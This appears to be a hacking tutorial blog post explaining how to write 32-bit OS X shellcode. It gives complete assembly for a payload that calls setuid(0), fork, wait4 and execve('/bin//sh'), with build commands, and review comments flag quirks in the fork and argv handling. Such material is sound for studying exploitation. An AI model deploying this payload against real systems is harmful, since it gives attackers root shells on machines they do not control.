How to make a 32-bit OS X shellcode

We will make a basic shellcode (setuid + fork + wait4 + execve) for the 32-bit Intel architecture. The first step is to check the syscall.h file.

      Kana:osx capi_x$ cat /usr/include/sys/syscall.h

      #ifdef __APPLE_API_PRIVATE
      #define SYS_syscall        0
      #define SYS_exit           1
      #define SYS_fork           2
      #define SYS_read           3
      #define SYS_write          4
      #define SYS_open           5
      #define SYS_close          6
      #define SYS_wait4          7

This is a small proof of concept (a "hello girls" in asm) demonstrating that system calls can be made via INT 80h.

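      ; i386 Mach-O, NASM/yasm syntax. OS X i386 syscall convention: number
      ; in eax, arguments on the stack above one dummy dword (the kernel reads
      ; them at [esp+4], [esp+8], ...), int 0x80, nothing is popped by the kernel.
      section .text
          global _start

      _start:
          push len        ; arg3: count
          push msg        ; arg2: buf
          push 0x1        ; arg1: fd = stdout
          mov eax, 0x4    ; SYS_write
          sub esp, 0x4    ; dummy dword below the args (not alignment)
          int 0x80        ; write(1, msg, len)
          push 0x0        ; arg1: exit status; without this the status was
                          ; whatever lay in the old dummy slot (unspecified)
          mov eax, 0x1    ; SYS_exit
          sub esp, 0x4    ; dummy dword again
          int 0x80        ; exit(0)

      section .data
          msg db 'Hola nenas!', 0xa
          len equ $ - msg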

      Kana:osx capi_x$ file hello
      hello: Mach-O executable i386

      Kana:osx capi_x$ ./hello
      Hola nenas!

Given these results, the shellcode can be written in the usual way, taking care of esp and assembling it as 32-bit Mach-O.
And here is the result: nothing really awesome, but surely useful someday :-)

      ; i386 Mach-O, NASM/yasm syntax. Every syscall below follows the OS X
      ; i386 convention: syscall number in eax, arguments on the stack above
      ; one dummy dword (int 0x80 reads them at [esp+4], [esp+8], ...), and
      ; the kernel pops nothing, so leftover slots are reused by the next call.
      ; Syscall numbers used: setuid 23, fork 2, wait4 7, execve 0x3b
      ; (fork and wait4 match the syscall.h excerpt above).
      section .text
              global _start

      _start:
              xor     eax, eax
              push    eax                     ; arg1: uid = 0
              push    eax                     ; dummy dword
              mov     al, 23
              int     0x80    ; setuid(0)
              pop     eax                     ; eax = 0 (the dummy dword pushed last)
              inc     eax
              inc     eax                     ; eax = 2 = SYS_fork
              int     0x80    ; fork
              ; NOTE(review): nothing branches on the fork result, so both parent
              ; and child fall through to wait4 and execve below; the raw syscall's
              ; return value in the child also differs from libc's fork() — confirm
              ; this is the intended behaviour.
              pop     ebx                     ; ebx = 0 (the uid dword); esp back to its entry value
              push    eax                     ; filler dword, not read by wait4
              push    ebx                     ; arg4: rusage = NULL
              push    ebx                     ; arg3: options = 0
              push    ebx                     ; arg2: status = NULL
              push    eax                     ; arg1: pid returned by fork
              xor     eax, eax
              mov     al,7
              push    eax                     ; dummy dword
              int     0x80    ; wait4(pid, NULL, 0, NULL)
              xor     eax, eax
              push    eax                     ; NUL terminator of the path string
              push    0x68732f2f ; //sh
              push    0x6e69622f ; /bin  -> "/bin//sh\0" now lies on the stack
              mov     ebx, esp                ; ebx = path
              push    eax                     ; NULL dword: argv terminator and envp[0]
              push    esp                     ; address of that NULL (ends up as envp)
              push    esp                     ; address of the slot above (ends up as argv;
                                              ; argv[0] thus points at the NULL dword, i.e. "",
                                              ; not at the path — presumably sh tolerates this)
              push    ebx                     ; arg1: path
              mov     al, 0x3b
              push    eax                     ; dummy dword
              int     0x80    ; execve(path, argv, envp)

I will assemble it with yasm, which also supports 64-bit :-)

      yasm -f macho32 forkexecve32.s -o forkexecve32.o
      ld -static forkexecve32.o -o forkexecve32

Happy Hacking!
–
“No user serviceable parts included.”